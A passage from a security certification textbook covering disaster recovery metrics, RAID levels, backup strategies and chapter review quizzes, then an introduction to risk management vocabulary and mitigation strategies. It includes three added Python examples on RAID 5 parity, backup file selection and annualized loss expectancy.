A second important concept to understand is mean time to restore (or mean time to recovery). This term refers to the average time that it will take to restore a system to operational status (to recover from any failure). Knowing what this time is for critical systems and processes is important to developing effective, and realistic, recovery plans, including DRP, BCP, and backup plans.
The last two concepts are closely tied. As previously described, the recovery time objective is the goal an organization sets for the time within which it wants to have a critical service restored after a disruption in service occurs. It is based on the calculation of the maximum amount of time that can occur before unacceptable losses take place. Also covered was the recovery point objective, which is based on a determination of how much data loss an organization can withstand.
Taken together, these four concepts are important considerations for an organization developing its various contingency plans. Having RTO and RPO that are shorter than the MTTR can result in losses. And attempting to lower the mean time between failures or the recovery time objectives below what is required by the organization wastes money that could be better spent elsewhere. The key is in understanding these figures and balancing them.
Backout Planning
An issue related to backups is the issue of returning to an earlier release of a software application in the event that a new release causes either a partial or complete failure. Planning for such an event is referred to as backout planning. These plans should address both a partial and a full return to previous releases of software. Sadly, this sort of event is more frequent than most would suspect. The reason for this is the interdependence of various aspects of a system. It is not uncommon for one piece of software to take advantage of some feature of another. Should this feature change in a new release, another critical operation may be impacted.
RAID
One popular approach to increasing reliability in disk storage is Redundant Array of Independent Disks (RAID) (previously known as Redundant Array of Inexpensive Disks). RAID takes data that is normally stored on a single disk and spreads it out among several others. If any single disk is lost, the data can be recovered from the other disks where the data also resides. With the price of disk storage decreasing, this approach has become increasingly popular to the point that many individual users even have RAID arrays for their home systems. RAID can also increase the speed of data recovery, as multiple drives can be busy retrieving requested data at the same time instead of relying on just one disk to do the work. Several different RAID approaches can be considered:
RAID 0 (striped disks) simply spreads the data that would be kept on the one disk across several disks. This decreases the time it takes to retrieve data, because the data is read from multiple drives at the same time, but it does not improve reliability, because the loss of any single drive will result in the loss of all the data (since portions of files are spread out among the different disks). With RAID 0, the data is split across all the drives with no redundancy offered.
RAID 1 (mirrored disks) is the opposite of RAID 0. RAID 1 copies the data from one disk onto two or more disks. If any single disk is lost, the data is not lost since it is also copied onto the other disk(s). This method can be used to improve reliability and retrieval speed, but it is relatively expensive when compared to other RAID techniques.
RAID 2 (bit-level error-correcting code) is not typically used, as it stripes data across the drives at the bit level as opposed to the block level. It is designed to be able to recover the loss of any single disk through the use of error-correcting techniques.
RAID 3 (byte-striped with error check) spreads the data across multiple disks at the byte level with one disk dedicated to parity bits. This technique is not commonly implemented, because input/output operations can't be overlapped due to the need for all to access the same disk (the disk with the parity bits).
RAID 4 (dedicated parity drive) stripes data across several disks but in larger stripes than in RAID 3, and it uses a single drive for parity-based error checking. RAID 4 has the disadvantage of not improving data retrieval speeds, since all retrievals still need to access the single parity drive.
RAID 5 (block-striped with error check) is a commonly used method that stripes the data at the block level and spreads the parity data across the drives. This provides both reliability and increased speed performance. This form requires a minimum of three drives.
RAID 0 through 5 are the original techniques, with RAID 5 being the most common method used, as it provides both the reliability and speed improvements. Additional methods have been implemented, such as duplicating the parity data across the disks (RAID 6) and a stripe of mirrors (RAID 10).
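RAID 5 block striping with rotating parity, as an added example that is not from the book: the stripe layout, the minimum of three drives, single-drive rebuild from XOR parity, and the refusal to rebuild after a second loss. The drive count, block size, sample payload and the particular parity rotation are this example's assumptions.

```python
"""RAID 5 as the chapter describes it: data striped at the block level across all
drives with the XOR parity block rotating from stripe to stripe, so any single drive
can be rebuilt from the others. Added example; the drive count, block size and the
sample payload are constructed, and the parity rotation is one common layout."""
from functools import reduce
from operator import xor


def xor_blocks(blocks):
    """Byte-wise XOR of equal-length blocks; with one block of a stripe missing,
    this recovers it whether it held data or parity."""
    return bytes(reduce(xor, column) for column in zip(*blocks))


def parity_disk(stripe_index, ndisks):
    """Drive holding parity for a stripe: the last drive for stripe 0, then one drive
    to the left per stripe, so no single drive becomes a parity bottleneck (RAID 4)."""
    return (ndisks - 1 - stripe_index) % ndisks


def raid5_write(data, ndisks, block=4):
    """Lay `data` out as RAID 5: each stripe is ndisks-1 data blocks plus one parity
    block. Returns one list of blocks per drive (payload zero-padded to whole stripes)."""
    if ndisks < 3:
        raise ValueError("RAID 5 requires a minimum of three drives")
    k = ndisks - 1                                  # data blocks per stripe
    padded = data + b"\0" * (-len(data) % (block * k))
    chunks = [padded[i:i + block] for i in range(0, len(padded), block)]
    disks = [[] for _ in range(ndisks)]
    for s, start in enumerate(range(0, len(chunks), k)):
        stripe = chunks[start:start + k]
        parity = xor_blocks(stripe)
        data_iter = iter(stripe)
        for d in range(ndisks):
            disks[d].append(parity if d == parity_disk(s, ndisks) else next(data_iter))
    return disks


def raid5_read(disks, length):
    """Reassemble the payload by skipping the parity block of each stripe."""
    ndisks = len(disks)
    out = bytearray()
    for s in range(len(disks[0])):
        p = parity_disk(s, ndisks)
        for d in range(ndisks):
            if d != p:
                out += disks[d][s]
    return bytes(out[:length])


def rebuild(disks, failed):
    """Reconstruct drive `failed` (marked None in `disks`) from the survivors.
    Raises if more than one drive is gone: RAID 5 tolerates a single drive loss."""
    survivors = [d for d in range(len(disks)) if d != failed and disks[d] is not None]
    if len(survivors) != len(disks) - 1:
        raise ValueError("more than one drive lost; RAID 5 cannot rebuild")
    nstripes = len(disks[survivors[0]])
    return [xor_blocks([disks[d][s] for d in survivors]) for s in range(nstripes)]


def demo(ndisks=4):
    """Write a constructed payload, fail one drive, rebuild it and read back."""
    payload = b"Chapter 19 sample payload: business continuity and disaster recovery"
    disks = raid5_write(payload, ndisks)
    lost = disks[1]
    disks[1] = None                                 # simulate drive 1 failing
    disks[1] = rebuild(disks, 1)
    return {
        "rebuilt_matches": disks[1] == lost,
        "read_back_matches": raid5_read(disks, len(payload)) == payload,
        "raw_to_usable_ratio": ndisks / (ndisks - 1),  # one drive's worth goes to parity
    }


if __name__ == "__main__":
    print(demo())
```

The ratio shows why RAID 5 is cheaper than RAID 1 mirroring: four drives give three drives of usable space rather than two.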
Exam Tip: Knowledge of the basic RAID structures by number designation is a testable element and should be memorized for the exam.
Spare Parts and Redundancy
RAID increases reliability through the use of redundancy. When developing plans for ensuring that an organization has what it needs to keep operating, even if hardware or software fails or if security is breached, you should consider other measures involving redundancy and spare parts. Some common applications of redundancy include the use of redundant servers, redundant connections, and redundant ISPs. The need for redundant servers and connections may be fairly obvious, but the need for redundant ISPs may not be so, at least initially. Many ISPs already have multiple accesses to the Internet on their own, but by having additional ISP connections, an organization can reduce the chance that an interruption of one ISP will negatively impact the organization. Ensuring uninterrupted access to the Internet by employees or access to the organization’s e-commerce site for customers is becoming increasingly important.
An interesting historical note is that RAID originally stood for Redundant Array of Inexpensive Disks but the name was changed to the currently accepted Redundant Array of Independent Disks as a result of industry influence.
Many organizations don’t see the need for maintaining a supply of spare parts. After all, with the price of storage dropping and the speed of processors increasing, why replace a broken part with older technology? However, a ready supply of spare parts can ease the process of bringing the system back online. Replacing hardware and software with newer versions can sometimes lead to problems with compatibility. An older version of some piece of critical software may not work with newer hardware, which may be more capable in a variety of ways. Having critical hardware (or software) spares for critical functions in the organization can greatly facilitate maintaining business continuity in the event of software or hardware failures.
Chapter 19 Review
Chapter Summary
After reading this chapter and completing the exercises, you should understand the following regarding disaster recovery and business continuity.
Describe the various components of a business continuity plan
A business continuity plan should contemplate the many types of disasters that can cause a disruption to an organization.
A business impact assessment (BIA) can be conducted to identify the most critical functions for an organization.
A business continuity plan is created to outline the order in which business functions will be restored so that the most critical functions are restored first.
One of the most critical elements of any disaster recovery plan is the availability of system backups.
Describe the elements of disaster recovery plans
Critical elements of disaster recovery plans include business continuity plans and contingency planning.
A disaster recovery plan outlines an organization’s plans to recover in the event a disaster strikes.
Describe the various ways backups are conducted and stored
Backups should include not only the organization’s critical data but critical software as well.
Backups may be conducted by backing up all files (full backup), only the files that have changed since the last full backup (differential backup), only the files that have changed since the last full or differential backup (incremental backup), or only the portion of the files that has changed since the last delta or full backup (delta backup).
Backups should be stored both on site for quick access if needed as well as off site in case a disaster destroys the primary facility, its processing equipment, and the backups that are stored on site.
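The summary above lists four backup strategies by what each one selects. The following added example, not code from the textbook, models those selection rules over a small constructed file set so the difference between them is visible: a full backup takes every file, a differential takes files changed since the last full, an incremental takes files changed since the most recent prior backup of any kind, and a delta takes only the changed portions of files, measured here against per-block hashes recorded at the last full or delta run. The file names, timestamps and block size are constructed.

```python
"""Which files (or parts of files) does each backup strategy capture?

Added example, not code from the textbook. Full, differential, incremental
and delta selection rules are applied to a constructed set of files with
constructed modification times; the delta rule compares per-block SHA-256
hashes against those recorded by the last full or delta run.
"""
import hashlib
from dataclasses import dataclass, field
from typing import Dict, List, Optional

DELTA_BLOCK = 8  # bytes per delta block; small so the demo is readable (constructed)


@dataclass
class FileState:
    path: str
    mtime: int       # last-modified time in seconds (constructed values below)
    content: bytes


@dataclass
class BackupLog:
    """When each kind of backup last ran, plus the per-block hashes recorded
    by the most recent full or delta backup (the delta reference point)."""
    last_full: Optional[int] = None
    last_differential: Optional[int] = None
    last_incremental: Optional[int] = None
    block_hashes: Dict[str, List[str]] = field(default_factory=dict)


def block_hashes(content: bytes) -> List[str]:
    """SHA-256 of each fixed-size block; an unchanged block keeps its hash."""
    return [hashlib.sha256(content[i:i + DELTA_BLOCK]).hexdigest()
            for i in range(0, len(content), DELTA_BLOCK)]


def select_full(files: List[FileState]) -> List[str]:
    """Full backup: every file, regardless of history."""
    return [f.path for f in files]


def select_differential(files: List[FileState], log: BackupLog) -> List[str]:
    """Differential: files changed since the last full backup."""
    if log.last_full is None:
        raise ValueError("a differential backup needs a prior full backup")
    return [f.path for f in files if f.mtime > log.last_full]


def select_incremental(files: List[FileState], log: BackupLog) -> List[str]:
    """Incremental: files changed since the most recent prior backup of any kind."""
    runs = [t for t in (log.last_full, log.last_differential, log.last_incremental)
            if t is not None]
    if not runs:
        raise ValueError("an incremental backup needs a prior backup")
    return [f.path for f in files if f.mtime > max(runs)]


def select_delta(files: List[FileState], log: BackupLog) -> Dict[str, List[int]]:
    """Delta: map each changed file to the indexes of its changed blocks.

    A block is changed when its hash differs from the recorded one or when it
    lies beyond the recorded length (the file grew). A file that shrank is
    listed too, with no new blocks, so a restore knows to truncate it.
    """
    changed: Dict[str, List[int]] = {}
    for f in files:
        old = log.block_hashes.get(f.path, [])
        new = block_hashes(f.content)
        dirty = [i for i, h in enumerate(new) if i >= len(old) or old[i] != h]
        if dirty or len(new) < len(old):
            changed[f.path] = dirty
    return changed


def demo_selection() -> dict:
    """Constructed history: full backup at t=0, an incremental at t=100, then edits."""
    files = [
        FileState("ledger.db", mtime=0, content=b"A" * 16),
        FileState("policy.txt", mtime=0, content=b"B" * 16),
        FileState("notes.txt", mtime=0, content=b"C" * 8),
    ]
    log = BackupLog(last_full=0,
                    block_hashes={f.path: block_hashes(f.content) for f in files})
    # t=50: the second block of ledger.db is rewritten; an incremental runs at t=100
    files[0].content, files[0].mtime = b"A" * 8 + b"Z" * 8, 50
    log.last_incremental = 100
    # t=150: a block is appended to policy.txt
    files[1].content, files[1].mtime = b"B" * 16 + b"N" * 8, 150
    return {
        "full": select_full(files),
        "differential": select_differential(files, log),  # changed since t=0
        "incremental": select_incremental(files, log),    # changed since t=100
        "delta": select_delta(files, log),                # blocks changed since the full
    }
```

Running `demo_selection()` shows the trade-off the essay question at the end of the chapter asks about: the differential set grows until the next full backup (here two files), the incremental set is the smallest (one file) but a restore must replay every incremental in order, and the delta set is smaller still (single blocks) at the cost of the most complicated restoration.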
Explain different strategies for alternative site processing
Plans should be created to continue operations at an alternative site if a disaster damages or destroys a facility.
Possibilities for an alternative site include hot, warm, and cold sites.
Developing a mutual aid agreement with a similar organization that could host your operations for a brief period of time after a disaster is another alternative.
Key Terms
backout planning (601)
business continuity plan (BCP) (585)
business impact analysis (BIA) (586)
cold site (597)
delta backup (593)
differential backup (593)
disaster recovery plan (DRP) (587)
fault tolerance (599)
full backup (592)
high availability (599)
hot site (597)
incremental backup (593)
mutual aid agreement (597)
recovery point objective (RPO) (591)
recovery time objective (RTO) (591)
Redundant Array of Independent Disks (RAID) (601)
warm site (597)
Key Terms Quiz
Use terms from the Key Terms list to complete the sentences that follow. Don’t use the same term more than once. Not all terms will be used.
1. _______________ is the maximum period of time in terms of data loss that is acceptable during an outage.
2. A(n) _______________ is a partially configured backup processing facility that usually has the peripherals and software but perhaps not the more expensive main processing computer.
3. A backup that includes only the files that have changed since the last full backup was completed is called a(n) _______________.
4. A(n) _______________ is an evaluation of the impact that a loss of critical functions will have on the organization.
5. Linking multiple systems together to appear as one large system in terms of capacity is called _______________.
6. A _______________ is performed to identify critical business functions needed during times of disaster or other reduced capability.
7. An agreement in which similar organizations agree to assume the processing for the other in the event a disaster occurs is known as a(n) _______________.
8. The average time that it will take to restore a system to operational status is called _______________.
9. A(n) _______________ is a fully configured backup environment that is similar to the normal operating environment and that can be operational within a few hours.
10. _______________ is a method to ensure high availability that is accomplished by the mirroring of data and systems. Should an event occur that causes disruption in a device, the mirrored system provides the requested data, with no apparent interruption in service.
Multiple-Choice Quiz
1. Why is it important that security exercises be conducted?
A. To provide the opportunity for all parties to practice the procedures that have been established to respond to a security incident.
B. To determine if the organization’s plan and the individuals involved perform as they should during a simulated security incident.
C. To determine if processes developed to handle security incidents are sufficient for the organization.
D. All of the above.
2. A good backup plan will include which of the following?
A. The critical data needed for the organization to operate
B. Any software that is required to process the organization’s data
C. Specific hardware to run the software or to process the data
D. All of the above
3. In which backup strategy are only those portions of the files and software that have changed since the last backup backed up?
A. Full
B. Differential
C. Incremental
D. Delta
4. Which of the following is a consideration in calculating the cost of a backup strategy?
A. The cost of the backup media
B. The storage costs for the backup media
C. The frequency with which backups are created
D. All of the above
5. Which of the following is the name for a partially configured environment that has the peripherals and software that the normal processing facility contains and that can be operational within a few days?
A. Hot site
B. Warm site
C. Online storage system
D. Backup storage facility
6. Which of the following is considered an issue with long-term storage of magnetic media, as discussed in the chapter?
A. Tape media can be used a limited number of times before it degrades.
B. Software and hardware evolve, and the media stored may no longer be compatible with current technology.
C. Both A and B.
D. None of the above.
7. What common utility or infrastructure is important to consider when developing your recovery plans?
A. Transportation
B. Oil and gas
C. Communications
D. Television/cable
8. For organizations that draw a distinction between a BCP and a DRP, which of the following is true?
A. The BCP details the functions that are most critical and outlines the order in which critical functions should be returned to service to maintain business operations.
B. The BCP is a subset of the DRP.
C. The DRP outlines the minimum set of business functions required for the organization to continue functioning.
D. The DRP is always developed first and the BCP normally is an attachment to this document.
9. A business impact assessment (BIA) is conducted to:
A. Outline the order in which critical functions should be returned to service to maintain business operations
B. Identify the most critical functions for an organization
C. Identify the critical employees who must be on site to implement the BCP
D. Establish the policies governing the organization’s backup policy
10. To ensure that critical systems are not lost during a failure, it is important that which of the following be true?
A. MTTF < MTTR.
B. MTTR < RTO.
C. RPO < MTTF.
D. RTO = RPO.
Essay Quiz
1. Write a paragraph outlining the differences between a disaster recovery plan and a business continuity plan. Is one more important than the other?
2. Write a brief description of the different backup strategies. Include a discussion of which of these strategies requires the greatest amount of storage space to conduct and which of the strategies involves the most complicated restoration scheme.
3. Your boss recently attended a seminar in which the importance of creating and maintaining a backup of critical data was discussed. He suggested to you that you immediately make a tape backup of all data, place it in a metal box, lock it, and keep it at home. You don’t agree with this specific method, but you need to develop a plan that he will understand and find persuasive. Write a proposal describing your recommendations, making sure to include the issues involved with the long-term storage of backups.
Lab Project
• Lab Project 19.1
The Windows operating system considers backups to be an essential task and will send system maintenance reminders via the Action Center. Determine the backup condition of your PC using the Action Center and demonstrate how it changes when backed up.
Chapter 20 Risk Management
The revolutionary idea that defines the boundary between modern times and the past is the mastery of risk: the notion that the future is more than a whim of the gods and that men and women are not passive before nature. Until human beings discovered a way across that boundary, the future was the mirror of the past or the murky domain of oracles and soothsayers who held a monopoly over knowledge of anticipated events.
—PETER BERNSTEIN
In this chapter, you will learn how to
Use risk management tools and principles to manage risk effectively
Explore risk mitigation strategies
Describe risk models
Explain the differences between qualitative and quantitative risk assessment
Use risk management tools
Examine risk management best practices
Risk management can best be described as a decision-making process. In the simplest terms, when you manage risk, you determine what could happen to your business, you assess the impact if it were to happen, and you decide what you could do to control that impact as much as you or your management deems necessary. You then decide to act or not to act, and, finally, you evaluate the results of your decision. The process may be iterative, as industry best practices clearly indicate that an important aspect of effectively managing risk is to consider it an ongoing process.
Cross Check
Change Management and Risk Management Are Critical Management Tools
Risk management is one of the reasons behind change management. Change management is a process designed to enable management efforts to understand implications of changes prior to incorporation in production systems. When someone requests a change to production, do they have answers to questions such as these:
1. What are the security implications of this change?
2. What is the backout plan in the event the change causes unintentional problems?
For more detail, refer to Chapter 21, which explains details of change management as a critical management tool.
An Overview of Risk Management
Risk management is an essential element of management from the enterprise level down to the individual project. Risk management encompasses all the actions taken to reduce complexity, increase objectivity, and identify important decision factors. There has been, and will continue to be, discussion about the complexity of risk management and whether or not it is worth the effort. Businesses must take risks to retain their competitive edge, however, and as a result, risk management must occur as part of managing any business, program, or project.
Risk management is about making a business profitable—not about buying insurance.
Risk management is both a skill and a task that is performed by all managers, either deliberately or intuitively. It can be simple or complex, depending on the size of the project or business and the amount of risk inherent in an activity. Every manager, at all levels, must learn to manage risk. The required skills can be learned.
Example of Risk Management at the International Banking Level
The Basel Committee on Banking Supervision comprises government central-bank governors from around the world. This body created a basic, global risk management framework for market and credit risk. It implemented internationally a flat 8 percent capital charge to banks to manage bank risks. In layman’s terms, this means that for every $100 a bank makes in loans, it must possess $8 in reserve to be used in the event of financial difficulties. However, if banks can show they have very strong risk mitigation procedures and controls in place, that capital charge can be reduced to as low as $0.37 (0.37 percent). If a bank has poor procedures and controls, that capital charge can be as high as $45 (45 percent) for every $100 the bank loans out. See www.bis.org/bcbs/ for source documentation regarding the Basel Committee.
Exam Tip: This chapter contains several bulleted lists. These are designed for easy memorization in preparation for taking the CompTIA Security+ exam.
This example shows that risk management can be and is used at very high levels—the remainder of this chapter focuses on smaller implementations and demonstrates that risk management is used in many aspects of business conduct.
Risk Management Vocabulary
You need to understand a number of key terms to manage risk successfully. Some of these terms are defined here because they are used throughout the chapter. This list is somewhat ordered according to the organization of this chapter. More comprehensive definitions and other pertinent terms are listed alphabetically in the glossary at the end of this book.
Risk: Risk is the possibility of suffering harm or loss.
Risk management: Risk management is the overall decision-making process of identifying threats and vulnerabilities and their potential impacts, determining the costs to mitigate such events, and deciding what actions are cost effective for controlling these risks.
Risk assessment: Risk assessment is the process of analyzing an environment to identify the risks (threats and vulnerabilities) and mitigating actions to determine (either quantitatively or qualitatively) the impact of an event that would affect a project, program, or business. Also referred to as risk analysis.
Tech Tip
Types of Controls
Controls can be classified based on the types of actions they perform. Three classes of controls exist:
Management or Administrative
Technical
Operational or Physical
For each of these classes, there are six types of controls:
Deterrent (to discourage occurrences)
Preventative (to avoid occurrence)
Detective (to detect or identify occurrence)
Corrective (to correct or restore controls)
Recovery (to restore resources, capabilities, or losses)
Compensating (to mitigate when direct control is not possible)
Asset: An asset is any resource or information an organization needs to conduct its business.
Threat: A threat is any circumstance or event with the potential to cause harm to an asset. For example, a malicious hacker might choose to hack your system by using readily available hacking tools.
Threat actor: A threat actor (agent) is the entity behind a threat.
Threat vector: A threat vector is a method used to effect a threat—for example, malware (threat) that is delivered via a watering-hole attack (vector).
Vulnerability: A vulnerability is any characteristic of an asset that can be exploited by a threat to cause harm. A vulnerability can also be the result of a lack of security controls, or weaknesses in controls. Your system has a security vulnerability, for example, if you have not installed patches to fix a cross-site scripting (XSS) error on your website.
Impact: Impact is the loss (or harm) resulting when a threat exploits a vulnerability. A malicious hacker (threat agent) uses an XSS tool (threat vector) to hack your unpatched website (the vulnerability), stealing credit card information (threat) that is then used fraudulently. The credit card company pursues legal recourse against your company to recover the losses from the credit card fraud (the impact).
Control: A control is a measure taken to detect, prevent, or mitigate the risk associated with a threat. Also called countermeasure or safeguard.
Qualitative risk assessment: Qualitative risk assessment is the process of subjectively determining the impact of an event that affects a project, program, or business. Completing the assessment usually involves the use of expert judgment, experience, or group consensus.
Quantitative risk assessment: Quantitative risk assessment is the process of objectively determining the impact of an event that affects a project, program, or business. Completing the assessment usually involves the use of metrics and models.
The distinction between qualitative and quantitative risk assessment will be more apparent as you read the section “Qualitative vs. Quantitative Risk Assessment,” later in the chapter.
Mitigate: The term mitigate refers to taking action to reduce the likelihood of a threat occurring, and to reduce the impact if a threat does occur.
Single loss expectancy (SLE): The single loss expectancy (SLE) is the monetary loss or impact of each occurrence of a threat exploiting a vulnerability.
Exposure factor: Exposure factor is a measure of the magnitude of loss of an asset. Used in the calculation of single loss expectancy.
Annualized rate of occurrence (ARO): Annualized rate of occurrence (ARO) is the frequency with which an event is expected to occur on an annualized basis.
Exam Tip: These terms are important, and you should completely memorize their meanings before taking the CompTIA Security+ exam.
Annualized loss expectancy (ALE): Annualized loss expectancy (ALE) is how much an event is expected to cost per year.
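The four quantitative terms just defined (SLE, exposure factor, ARO and ALE) fit together arithmetically, and the risk management definition above turns on deciding which controls are "cost effective". The following added example, not code from the textbook, carries that arithmetic through: SLE = asset value x exposure factor and ALE = SLE x ARO are the standard quantitative formulas behind these definitions, and a control's net annual value is the ALE it removes minus its annual cost. The dollar figures, event frequencies and control cost are constructed.

```python
"""Quantitative risk arithmetic: SLE, ALE and the net value of a control.

Added example, not code from the textbook. Uses the standard relationships
SLE = asset value x exposure factor and ALE = SLE x ARO behind the chapter's
definitions; every figure in the demo scenario is constructed.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class RiskScenario:
    asset_value: float      # monetary value of the asset
    exposure_factor: float  # fraction of the asset's value lost per event, 0.0 to 1.0
    aro: float              # annualized rate of occurrence: expected events per year

    def __post_init__(self) -> None:
        if not 0.0 <= self.exposure_factor <= 1.0:
            raise ValueError("exposure factor must be between 0 and 1")
        if self.asset_value < 0 or self.aro < 0:
            raise ValueError("asset value and ARO cannot be negative")


def aro_from_interval(years_between_events: float) -> float:
    """An event expected once every N years has ARO = 1 / N."""
    if years_between_events <= 0:
        raise ValueError("interval must be positive")
    return 1.0 / years_between_events


def single_loss_expectancy(s: RiskScenario) -> float:
    """SLE: the monetary loss from one occurrence of the threat."""
    return s.asset_value * s.exposure_factor


def annualized_loss_expectancy(s: RiskScenario) -> float:
    """ALE: how much the event is expected to cost per year."""
    return single_loss_expectancy(s) * s.aro


def annual_control_benefit(before: RiskScenario, after: RiskScenario,
                           annual_control_cost: float) -> float:
    """Net annual value of a control: the ALE it removes minus what it costs.

    A positive result means the control is cost effective; a negative one
    means the organization would pay more for the control than the risk
    costs it each year.
    """
    return (annualized_loss_expectancy(before)
            - annualized_loss_expectancy(after)
            - annual_control_cost)


def demo_web_server() -> dict:
    """Constructed scenario: a web server valued at $200,000.

    A compromise is assumed to destroy 25% of that value and to be expected
    once every two years. A proposed control halves the expected frequency.
    """
    before = RiskScenario(asset_value=200_000, exposure_factor=0.25,
                          aro=aro_from_interval(2))
    after = RiskScenario(asset_value=200_000, exposure_factor=0.25,
                         aro=aro_from_interval(4))
    return {
        "sle": single_loss_expectancy(before),                           # 50,000
        "ale_before": annualized_loss_expectancy(before),                # 25,000
        "ale_after": annualized_loss_expectancy(after),                  # 12,500
        "benefit_at_8k": annual_control_benefit(before, after, 8_000),   # 4,500
        "benefit_at_15k": annual_control_benefit(before, after, 15_000), # -2,500
    }
```

The same control is worth buying at $8,000 a year and not at $15,000 a year, which is the point of expressing risk in annualized terms: the comparison is between two annual figures, not between a one-off loss and a recurring cost.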
Systematic risk: Systematic risk is the chance of loss that is predictable under relatively stable circumstances. Examples such as fire, wind, or flood produce losses that, in the aggregate over time, can be accurately predicted despite short-term fluctuations. Systematic risk can be diversified away, which gives managers a level of control that can be employed.
Unsystematic risk: Unsystematic risk is the chance of loss that is unpredictable in the aggregate because it results from forces difficult to predict. Examples include, but are not limited to, recession, unemployment, epidemics, war-related events, and so forth. Unsystematic risk cannot be mitigated via diversification, limiting management responses.
Hazard: A hazard is a circumstance that increases the likelihood or probable severity of a loss. For example, running systems without antivirus is a hazard because it increases the probability of loss due to malware.
What Is Risk Management?
Three definitions relating to risk management reveal why it is sometimes considered difficult to understand:
The dictionary defines risk as the possibility of suffering harm or loss.
Carnegie Mellon University’s Software Engineering Institute (SEI) defines continuous risk management as “processes, methods, and tools for managing risks in a project. It provides a disciplined environment for proactive decision-making to 1) assess continuously what could go wrong (risks); 2) determine which risks are important to deal with; and 3) implement strategies to deal with those risks” (SEI, Continuous Risk Management Guidebook [Pittsburgh, PA: Carnegie Mellon University, 1996], 22).
The Information Systems Audit and Control Association (ISACA) says, “In modern business terms, risk management is the process of identifying vulnerabilities and threats to an organization’s resources and assets and deciding what countermeasures, if any, to take to reduce the level of risk to an acceptable level based on the value of the asset to the organization” (ISACA, Certified Information Systems Auditor (CISA) Review Manual, 2002 [Rolling Meadows, IL: ISACA, 2002], 344).
Tech Tip
Risk Management Applies to All Business Processes
Even Human Resource Management relies on risk management. For example, risk management theory used to posit that older workers were more likely to create liabilities. Recent studies have shown that as the workforce ages, it has become apparent that older workers have lower absenteeism, are more productive, and have higher levels of job satisfaction. Their greatest risk is longer recovery time from accidents—companies are finding ways to prevent accidents to manage that risk.
These three definitions show that risk management is based on what can go wrong and what action should be taken, if any. Figure 20.1 provides a macro-level view of how to manage risk.
• Figure 20.1 A planning decision flowchart for risk management
Risk Management Culture
Organizations have a culture associated with their operation. Frequently, this culture is set and driven by the activities of senior management personnel. The risk management culture of an organization can have an effect upon actions being taken by others. Table 20.1 illustrates the symptoms and results associated with risk management culture.
Table 20.1 Characteristics of Risk Management Culture
Business Risks
No comprehensive identification of all risks in a business environment is possible. In today’s technology-dependent business environment, risk is often simplistically divided into two areas: business risk and, a major subset, technology risk.
Tech Tip
Transferring Risk
One possible action to manage risk is to transfer that risk. The most common method of transferring risk is to purchase insurance. Insurance allows some level of risk to be transferred to a third party that manages specific types of risk for multiple parties, thus reducing the individual cost. Note that transferring risk usually applies to financial aspects of risk; it normally does not apply to legal accountability, or responsibility.
Examples of Business Risks
Following are some of the most common business risks:
Treasury management: Management of company holdings in bonds, futures, currencies, and so on
Revenue management: Management of consumer behavior and the generation of revenue
Contract management: Management of contracts with customers, vendors, partners, and so on
Fraud: Deliberate deception made for personal gain, to obtain property or services, and so on
Environmental risk management: Management of risks associated with factors that affect the environment
Regulatory risk management: Management of risks arising from new or existing regulations
Business continuity management: Management of risks associated with recovering and restoring business functions after a disaster or major disruption occurs
Technology: Management of risks associated with technology in its many forms
It is important that you understand that technology, itself, is a business risk. Hence, it must be managed along with other risks. Today, technology risks are so important they should be considered separately.
Examples of Technology Risks
Following are some of the most common technology risks:
Security and privacy: The risks associated with protecting personal, private, or confidential information
Information technology operations: The risks associated with the day-to-day operation of information technology systems
Business systems control and effectiveness: The risks associated with manual and automated controls that safeguard company assets and resources
Business continuity management: The risks associated with the technology and processes to be used in the event of a disaster or major disruption
Information systems testing: The risks associated with testing processes and procedures of information systems
Reliability and performance management: The risks associated with meeting reliability and performance agreements and measures
Information technology asset management: The risks associated with safeguarding information technology physical assets
Project risk management: The risks associated with managing information technology projects
Change management: The risks associated with managing configurations and changes (see Chapter 21)
Tech Tip
Risk According to the Basel Committee
The Basel Committee referenced earlier in the chapter has defined three types of risk specifically to address international banking:
Market risk: Risk of losses due to fluctuation of market prices
Credit risk: Risk of default of outstanding loans
Operational risk: Risk from disruption by people, systems, processes, or disasters
Risk Mitigation Strategies
Risk mitigation strategies are the action plans developed after a thorough evaluation of the possible threats, hazards, and risks associated with business operations. These strategies are employed to lessen the risks associated with operations. The focus of risk mitigation strategies is to reduce the effects of threats and hazards. Common mitigation strategies include change management, incident management, user rights and permission reviews, audits, and technology controls.
Exam Tip: When taking the exam, be prepared to implement appropriate risk mitigation strategies when provided scenarios.
Change Management
Change management has its roots in system engineering and takes the overall view of systems components and processes. Configuration management specifically applies to a lower level of detail, the actual configuration of components, such as hosts, devices, and so forth. Configuration management might be considered a subset of change management, but they are not the same thing. Most of today’s software and hardware change management practices derive from long-standing system engineering configuration management practices. Computer hardware and software development have also evolved to the point that proper management structure and controls must exist to ensure the products operate as planned. It is normal for an enterprise to have a Change Control Board to approve all production changes and ensure the change management procedures are followed before changes are introduced to a system.
Configuration control is the process of controlling changes to items that have been baselined. Configuration control ensures that only approved changes to a baseline are allowed to be implemented. It is easy to understand why a software system, such as a web-based order-entry system, should not be changed without proper testing and control—otherwise, the system might stop functioning at a critical time. Configuration control is a key step that provides valuable insight to managers. If a system is being changed, and configuration control is being observed, managers and others concerned will be better informed. This ensures proper use of assets and avoids unnecessary downtime due to the installation of unapproved changes.
Exam Tip: Change management ensures proper procedures are followed when modifying the IT infrastructure.
Incident Management
When an incident occurs, having an incident response management methodology is a key risk mitigation strategy. Incident response and incident management are essential security functions and are covered in detail in Chapter 22.
User Rights and Permissions Reviews
User rights and permissions reviews are one of the more powerful security controls. But the strength of this control depends upon it being kept up to date and properly maintained. Ensuring that the list of users and associated rights is complete and up to date is a challenging task in anything bigger than the smallest enterprises. A compensating control that can assist in keeping user rights lists current is a set of periodic audits of the user base and associated permissions.
Data Loss or Theft
Data is the primary target of most attackers. The value of the data can vary, making some data more valuable and hence more at risk of theft. Data can also be lost through a variety of mechanisms, with hardware failure, operator error, and system errors being common causes. Regardless of the cause of loss, an organization can take various actions to mitigate the effects of the loss. Backups lead the list of actions, for backups can provide the ultimate in protection against loss. To prevent theft, a variety of controls can be employed. Some are risk mitigation steps, such as data minimization, which is the act of not storing what isn’t needed. If it must be stored and has value, then technologies such as data loss prevention can be used to provide a means of protection. Simple security controls such as firewalls and network segmentation can also act to make data theft more difficult.
Exam Tip: When taking the exam, understand the policies and procedures to prevent data loss or theft.
Risk Management Models
Risk management concepts are fundamentally the same despite their definitions, and they require similar skills, tools, and methodologies. Several models can be used for managing risk through its various phases. Two models are presented here: the first can be applied to managing risks in general, and the second is tailored for managing risk in software projects.
General Risk Management Model
